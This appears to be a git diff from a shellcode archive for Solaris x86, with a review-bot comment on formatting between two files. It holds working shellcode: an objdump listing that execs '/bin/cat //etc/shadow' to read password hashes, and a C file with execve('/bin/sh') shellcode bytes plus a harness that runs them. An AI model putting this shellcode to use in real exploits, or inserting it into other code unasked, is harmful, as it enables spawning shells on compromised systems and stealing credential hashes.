+ 8050418: 33 d2 xor %edx,%edx
+ 805041a: 52 push %edx
+ 805041b: 68 61 64 6f 77 push $0x776f6461
+ 8050420: 68 63 2f 73 68 push $0x68732f63
+ 8050425: 68 2f 2f 65 74 push $0x74652f2f
+ 805042a: 8b cc mov %esp,%ecx
+ 805042c: 52 push %edx
+ 805042d: 68 2f 63 61 74 push $0x7461632f
+ 8050432: 68 2f 62 69 6e push $0x6e69622f
+ 8050437: 8b dc mov %esp,%ebx
+ 8050439: 52 push %edx
+ 805043a: 51 push %ecx
+ 805043b: 53 push %ebx
+ 805043c: 8b cc mov %esp,%ecx
+ 805043e: 52 push %edx
+ 805043f: 51 push %ecx
+ 8050440: 53 push %ebx
+ 8050441: b0 3b mov $0x3b,%al
+ 8050443: 52 push %edx
+ 8050444: cd 91 int $0x91
+ 8050446: 33 c0 xor %eax,%eax
+ 8050448: 50 push %eax
+ 8050449: b0 01 mov $0x1,%al
+ 805044b: cd 91 int $0x91
\ No newline at end of file
diff --git a/shellcodes/solaris_x86/43625.c b/shellcodes/solaris_x86/43625.c
new file mode 100644
index 000000000..086997279
--- /dev/null
+++ b/shellcodes/solaris_x86/43625.c
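Review bot: The file is stored as `.asm` but contains a C harness (`char code[]`, `int main(int argc, char **argv)`) followed by an objdump listing, with a prose header (`Name = John Babio` ...) outside any comment, so as committed it is neither assembler nor C; split it into a `.c` harness with the listing in a block comment, or rename it and keep the listing alone. In the harness `(int)(*func)();` casts the call's result to `int` and then discards it, which does nothing, and `argc`/`argv` are unused; `func();` under `int main(void)` says the same thing.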
@@ -0,0 +1,42 @@
+/*
+ * Solaris shellcode - execve /bin/sh
+ */
+
+#include
+
+// http://www.shellcode.com.ar
+//
+// execve(//bin/sh)
+
+char shellcode[]=
+ "\xb8\xff\xf8\xff\x3c" // mov eax, 03cfff8ffh
+ "\xf7\xd0" // not eax
+ "\x50" // push eax
+ "\x31\xc0" // xor eax, eax
+ "\xb0\x9a" // mov al, 09ah
+ "\x50" // push eax
+ "\x89\xe5" // mov ebp, esp
+ "\x31\xc0" // xor eax, eax
+ "\x50" // push eax
+ "\x68\x2f\x2f\x73\x68" // push dword 68732f2fh
+ "\x68\x2f\x62\x69\x6e" // push dword 6e69622fh
+ "\x89\xe3" // mov ebx, esp
+ "\x50" // push eax
+ "\x53" // push ebx
+ "\x89\xe2" // mov edx, esp
+ "\x50" // push eax
+ "\x52" // push edx
+ "\x53" // push ebx
+ "\xb0\x3b" // mov al, 59
+ "\xff\xd5"; // call ebp
+
+//
+
+int
+main(void)
+{
+ void (*code)() = (void *)shellcode;
+ printf("Shellcode length: %d\n", strlen(shellcode));
+ code();
+ return(1);
+}
\ No newline at end of file